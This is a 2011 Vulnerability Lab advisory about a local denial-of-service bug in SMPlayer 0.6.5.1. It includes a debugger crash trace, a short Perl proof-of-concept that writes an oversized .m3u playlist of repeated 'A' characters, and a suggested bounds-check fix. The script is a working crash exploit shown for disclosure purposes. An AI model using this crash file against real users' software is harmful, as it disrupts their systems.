SMPlayer v0.6.5.1 - Denial of Service Vulnerability

Document Title:
===============
SMPlayer v0.6.5.1 - Denial of Service Vulnerability



Release Date:
=============
2011-06-16


Vulnerability Laboratory ID (VL-ID):
====================================
57


Product & Service Introduction:
===============================
SMPlayer intends to be a complete front-end for MPlayer, from basic features like playing videos, DVDs, and VCDs to more advanced features like support for MPlayer filters and more.

One of the most interesting features of SMPlayer: it remembers the settings of all files you play. So you start to watch a movie but you have to leave... don t worry, when you open that movie again it will resume at the same point you left it, and with the same settings: audio track, subtitles, volume...

Other additional interesting features:

    * Configurable subtitles. You can choose font and size, and even colors for the subtitles.
    * Audio track switching. You can choose the audio track you want to listen. Works with avi and mkv. And of course with DVDs.
    * Seeking by mouse wheel. You can use your mouse wheel to go forward or backward in the video.
    * Video equalizer, allows you to adjust the brightness, contrast, hue, saturation and gamma of the video image.
    * Multiple speed playback. You can play at 2X, 4X... and even in slow motion.
    * Filters. Several filters are available: deinterlace, postprocessing, denoise... and even a karaoke filter (voice removal).
    * Audio and subtitles delay adjustment. Allows you to sync audio and subtitles.
    * Advanced options, such as selecting a demuxer or video & audio codecs.
    * Playlist. Allows you to enqueue several files to be played one after each other. Autorepeat and shuffle supported too.
    * Preferences dialog. You can easily configure every option of SMPlayer by using a nice preferences dialog.
    * Possibility to search automatically for subtitles in opensubtitles.org.
    * Translations: currently SMPlayer is translated into more than 20 languages, including Spanish, German, French, Italian, Russian, Chinese, Japanese....
    * It s multiplatform. Binaries available for Windows and Linux.
    * SMPlayer is under the GPL license.

(Copy of the Vendor Homepage: http://smplayer.sourceforge.net/index.php?tr_lang=en)


Abstract Advisory Information:
==============================
Vulnerability Lab Team discovered a Denial of Service Vulnerability for SM-Player.
A local attacker is able to crash the software and all bound running processes.


Vulnerability Disclosure Timeline:
==================================
2011-06-17:	Public or Non-Public Disclosure



Discovery Status:
=================
Published


Affected Product(s):
====================

Exploitation Technique:
=======================
Local


Severity Level:
===============
Low


Technical Details & Description:
================================
Due a boundry error the program produces a unkown error and after that hangs. 
In adition it increases its cpu usage a fair bit.

Microsoft (R) Windows Debugger Version 6.11.0001.404 X86
Copyright (c) Microsoft Corporation. All rights reserved.

CommandLine: C:/Program Files/SMPlayer/smplayer.exe/
Symbol search path is: *** Invalid ***
****************************************************************************
* Symbol loading may be unreliable without a symbol search path.           *
* Use .symfix to have the debugger choose a symbol path.                   *
* After setting your symbol path, use .reload to refresh symbol locations. *
****************************************************************************
Executable search path is: 
ModLoad: 00400000 00688000   image00400000
ModLoad: 7c800000 7c8c0000   ntdll.dll
ModLoad: 77e40000 77f42000   C:/WINDOWS/system32/kernel32.dll
ModLoad: 6fbc0000 6fbc8000   C:/Program Files/SMPlayer/mingwm10.dll
ModLoad: 77ba0000 77bfa000   C:/WINDOWS/system32/msvcrt.dll
ModLoad: 77670000 777a9000   C:/WINDOWS/system32/OLE32.dll
ModLoad: 77c00000 77c48000   C:/WINDOWS/system32/GDI32.dll
ModLoad: 77380000 77411000   C:/WINDOWS/system32/USER32.dll
ModLoad: 77f50000 77feb000   C:/WINDOWS/system32/ADVAPI32.dll
ModLoad: 77c50000 77cef000   C:/WINDOWS/system32/RPCRT4.dll
ModLoad: 76f50000 76f63000   C:/WINDOWS/system32/Secur32.dll
ModLoad: 10000000 100c1000   C:/Program Files/SMPlayer/QxtCore.dll
ModLoad: 6a1c0000 6a453000   C:/Program Files/SMPlayer/QtCore4.dll
ModLoad: 71c00000 71c17000   C:/WINDOWS/system32/WS2_32.DLL
ModLoad: 71bf0000 71bf8000   C:/WINDOWS/system32/WS2HELP.dll
ModLoad: 65100000 65afa000   C:/Program Files/SMPlayer/QtGui4.dll
ModLoad: 762b0000 762f9000   C:/WINDOWS/system32/COMDLG32.DLL
ModLoad: 77da0000 77df2000   C:/WINDOWS/system32/SHLWAPI.dll
ModLoad: 77530000 775c7000   C:/WINDOWS/WinSxS/x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_5.82.3790.3959_x-ww_78FCF8D0/COMCTL32.dll
ModLoad: 7c8d0000 7d0cf000   C:/WINDOWS/system32/SHELL32.dll
ModLoad: 76290000 762ad000   C:/WINDOWS/system32/IMM32.DLL
ModLoad: 77d00000 77d8b000   C:/WINDOWS/system32/OLEAUT32.DLL
ModLoad: 76aa0000 76acd000   C:/WINDOWS/system32/WINMM.DLL
ModLoad: 73070000 73097000   C:/WINDOWS/system32/WINSPOOL.DRV
ModLoad: 6ff00000 7003d000   C:/Program Files/SMPlayer/QtNetwork4.dll
ModLoad: 6ed40000 6edc5000   C:/Program Files/SMPlayer/QtXml4.dll
(b18.6e0): Break instruction exception - code 80000003 (first chance)
eax=6ee00000 ebx=7ffdf000 ecx=00000005 edx=00000020 esi=7c8877f4 edi=00241f38
eip=7c81a3e1 esp=0022fb70 ebp=0022fcb4 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for ntdll.dll - 
ntdll!DbgBreakPoint:
7c81a3e1 cc              int     3
0:000> g
ModLoad: 77420000 77523000   C:/WINDOWS/WinSxS/x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.3790.3959_x-ww_D8713E55/comctl32.dll
ModLoad: 71bc0000 71bc8000   C:/WINDOWS/system32/rdpsnd.dll
ModLoad: 771f0000 77201000   C:/WINDOWS/system32/WINSTA.dll
ModLoad: 71c40000 71c97000   C:/WINDOWS/system32/NETAPI32.dll
ModLoad: 76b70000 76b7b000   C:/WINDOWS/system32/PSAPI.DLL
ModLoad: 4b3c0000 4b410000   C:/WINDOWS/system32/MSCTF.dll
ModLoad: 77b90000 77b98000   C:/WINDOWS/system32/version.dll
ModLoad: 75e60000 75e87000   C:/WINDOWS/system32/apphelp.dll
ModLoad: 4dc30000 4dc5e000   C:/WINDOWS/system32/msctfime.ime
ModLoad: 71b70000 71ba6000   C:/WINDOWS/system32/uxtheme.dll
ModLoad: 77b90000 77b98000   C:/WINDOWS/system32/version.dll
ModLoad: 76920000 769e2000   C:/WINDOWS/system32/userenv.dll
ModLoad: 01140000 01405000   C:/WINDOWS/system32/xpsp2res.dll
(b18.6e0): Unknown exception - code 000006b5 (first chance)


Pictures:  
                                ../picture1.png



Proof of Concept (PoC):
=======================
To reproduce the bug use this perl script to generate the m3u file. 
After that drag the m3u in the main window and then open the playlist window.

my $sploitfile="name.m3u";
print " [+] Preparing payload\n";
my $junk = "A" x 950000;
my $payload = $junk;
print " [+] Writing payload to file\n";
open(sploitf,">$sploitfile");
print sploitf $payload;
close(sploitf);
print " [+] Exploit file " . sploitfile . " created\n";
print " [+] Wrote " . length($payload) . " bytes\n";



Solution - Fix & Patch:
=======================
Implement a boundry check for the files that get loaded. 
Also check if the file validates the file type.


Security Risk:
==============
The Denial of Service Vulnerability can crash the software completly.
The security risk is estimated as low.


Credits & Authors:
==================
Vulnerability Research Laboratory  -   N/A   Anonymous


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       - www.vulnerability-lab.com/register
Contact:    [email protected] 	- [email protected] 	       - [email protected]
Section:    video.vulnerability-lab.com 	- forum.vulnerability-lab.com 		       - news.vulnerability-lab.com
Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       - youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and 
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), 
modify, use or edit our material contact ([email protected] or [email protected]) to get a permission.

    				   	Copyright © 2012 | Vulnerability Laboratory